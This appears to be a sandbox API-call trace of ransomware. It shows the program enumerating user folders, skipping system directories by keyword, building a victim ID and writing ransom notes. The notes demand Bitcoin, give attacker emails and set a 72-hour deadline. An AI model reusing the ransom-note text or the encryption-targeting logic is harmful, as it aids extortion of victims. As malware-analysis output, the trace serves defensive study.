	[0180.005] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.005] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0180.006] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.006] CreateFileW (lpFileName="C:\\Users\\Default\\My Documents\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\my documents\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.006] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0180.007] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.007] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0180.007] CloseHandle (hObject=0x380) returned 1
	[0180.007] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\My Documents\\*.*" (normalized: "c:\\users\\default\\my documents\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x849e4f42, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x849e4f42, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84c93627, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0xffffffff
	[0180.007] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0180.007] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1
	[0180.008] lstrcmpW (lpString1="NetHood", lpString2="..") returned 1
	[0180.008] lstrcmpW (lpString1="NetHood", lpString2=".") returned 1
	[0180.008] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default"
	[0180.008] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0180.008] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NetHood" | out: lpString1="C:\\Users\\Default\\NetHood") returned="C:\\Users\\Default\\NetHood"
	[0180.008] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\NetHood" | out: lpString1="C:\\Users\\Default\\NetHood") returned="C:\\Users\\Default\\NetHood"
	[0180.008] lstrcatW (in: lpString1="C:\\Users\\Default\\NetHood", lpString2="\\" | out: lpString1="C:\\Users\\Default\\NetHood\\") returned="C:\\Users\\Default\\NetHood\\"
	[0180.008] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Default\\NetHood\\" | out: lpString1="C:\\Users\\Default\\NetHood\\") returned="C:\\Users\\Default\\NetHood\\"
	[0180.009] lstrcatW (in: lpString1="C:\\Users\\Default\\NetHood\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\NetHood\\*.*") returned="C:\\Users\\Default\\NetHood\\*.*"
	[0180.009] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\NetHood\\*.*" (normalized: "c:\\users\\default\\nethood\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x849e4f42, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x849e4f42, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84c93627, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0xffffffff
	[0180.009] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0180.009] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\NetHood" | out: lpString1="C:\\Users\\Default\\NetHood") returned="C:\\Users\\Default\\NetHood"
	[0180.009] lstrcatW (in: lpString1="C:\\Users\\Default\\NetHood", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\NetHood\\*.*") returned="C:\\Users\\Default\\NetHood\\*.*"
	[0180.009] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.010] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.010] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Default\\NetHood\\HELP_DECRYPT_YOUR_FILES.TXT") returned 52
	[0180.010] CreateFileW (lpFileName="C:\\Users\\Default\\NetHood\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\nethood\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.019] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0180.019] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0180.022] CloseHandle (hObject=0x380) returned 1
	[0180.022] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.023] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.023] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0180.024] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0180.024] CreateFileW (lpFileName="C:\\Users\\Default\\NetHood\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\nethood\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.025] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0180.025] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0180.025] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0180.025] CloseHandle (hObject=0x380) returned 1
	[0180.025] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.026] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.026] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0180.026] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Default\\NetHood\\HELP_DECRYPT_YOUR_FILES.HTML") returned 53
	[0180.026] CreateFileW (lpFileName="C:\\Users\\Default\\NetHood\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\nethood\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.029] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0180.029] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0180.032] CloseHandle (hObject=0x380) returned 1
	[0180.032] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.033] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.033] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.033] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0180.035] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.035] CreateFileW (lpFileName="C:\\Users\\Default\\NetHood\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\nethood\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.035] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0180.035] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.035] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0180.036] CloseHandle (hObject=0x380) returned 1
	[0180.036] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\NetHood\\*.*" (normalized: "c:\\users\\default\\nethood\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x849e4f42, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x849e4f42, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84c93627, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0xffffffff
	[0180.036] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0180.036] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84736170, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84736170, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8475c2af, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x40010, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="NTUSER~1.SCL")) returned 1
	[0180.036] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x31cb9166, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x31cb9166, ftLastAccessTime.dwHighDateTime=0x1d112dc, ftLastWriteTime.dwLowDateTime=0x31cb9166, ftLastWriteTime.dwHighDateTime=0x1d112dc, nFileSizeHigh=0x0, nFileSizeLow=0x9000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1
	[0180.036] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x31cb9166, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x31cb9166, ftLastAccessTime.dwHighDateTime=0x1d112dc, ftLastWriteTime.dwLowDateTime=0x31cb9166, ftLastWriteTime.dwHighDateTime=0x1d112dc, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1
	[0180.037] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8d5f4e96, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x8d5f4e96, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x8d61ae52, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1
	[0180.037] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8d5f4e96, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x8d5f4e96, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x8d61ae52, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1
	[0180.037] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8d61ae52, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x8d61ae52, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x8d61ae52, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1
	[0180.037] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1
	[0180.037] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1
	[0180.037] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1
	[0180.037] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default"
	[0180.037] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0180.037] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Pictures" | out: lpString1="C:\\Users\\Default\\Pictures") returned="C:\\Users\\Default\\Pictures"
	[0180.038] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Pictures" | out: lpString1="C:\\Users\\Default\\Pictures") returned="C:\\Users\\Default\\Pictures"
	[0180.038] lstrcatW (in: lpString1="C:\\Users\\Default\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Pictures\\") returned="C:\\Users\\Default\\Pictures\\"
	[0180.038] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Default\\Pictures\\" | out: lpString1="C:\\Users\\Default\\Pictures\\") returned="C:\\Users\\Default\\Pictures\\"
	[0180.038] lstrcatW (in: lpString1="C:\\Users\\Default\\Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Pictures\\*.*") returned="C:\\Users\\Default\\Pictures\\*.*"
	[0180.038] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Pictures\\*.*" (normalized: "c:\\users\\default\\pictures\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x84a57326, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0180.038] lstrlenW (lpString="C:\\Users\\Default\\Pictures\\*.*") returned 29
	[0180.039] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.039] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\Pictures\\*.*", cchLength=0x1d | out: lpsz="c:\\users\\default\\pictures\\*.*") returned 0x1d
	[0180.039] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.039] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="windows") returned 0x0
	[0180.039] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.039] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="boot") returned 0x0
	[0180.040] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.040] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="system volume information") returned 0x0
	[0180.040] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.040] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0180.040] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.040] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="temp") returned 0x0
	[0180.041] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.041] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="program files") returned 0x0
	[0180.041] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.041] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="program files (x86)") returned 0x0
	[0180.041] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.041] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="appdata") returned 0x0
	[0180.042] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.042] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="application data") returned 0x0
	[0180.042] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.042] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="winnt") returned 0x0
	[0180.042] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.042] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="tmp") returned 0x0
	[0180.042] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.043] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="cache") returned 0x0
	[0180.043] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.043] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="temporary internet files") returned 0x0
	[0180.043] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.043] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="webcache") returned 0x0
	[0180.043] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.044] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="inetcache") returned 0x0
	[0180.044] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.044] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="nvidia") returned 0x0
	[0180.044] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.044] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="packages") returned 0x0
	[0180.044] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.045] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="cookies") returned 0x0
	[0180.045] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.045] StrStrW (lpFirst="c:\\users\\default\\pictures\\*.*", lpSrch="programdata") returned 0x0
	[0180.045] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x84a57326, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0180.045] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84a57326, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84a57326, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84a7d3b2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0180.045] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2="..") returned 1
	[0180.046] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2=".") returned 1
	[0180.046] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\Default\\Pictures\\" | out: lpString1="C:\\Users\\Default\\Pictures\\") returned="C:\\Users\\Default\\Pictures\\"
	[0180.046] lstrcatW (in: lpString1="C:\\Users\\Default\\Pictures\\", lpString2="HELP_DECRYPT_YOUR_FILES.HTML" | out: lpString1="C:\\Users\\Default\\Pictures\\HELP_DECRYPT_YOUR_FILES.HTML") returned="C:\\Users\\Default\\Pictures\\HELP_DECRYPT_YOUR_FILES.HTML"
	[0180.046] lstrlenW (lpString="C:\\Users\\Default\\Pictures\\HELP_DECRYPT_YOUR_FILES.HTML") returned 54
	[0180.046] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.046] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\Pictures\\HELP_DECRYPT_YOUR_FILES.HTML", cchLength=0x36 | out: lpsz="c:\\users\\default\\pictures\\help_decrypt_your_files.html") returned 0x36
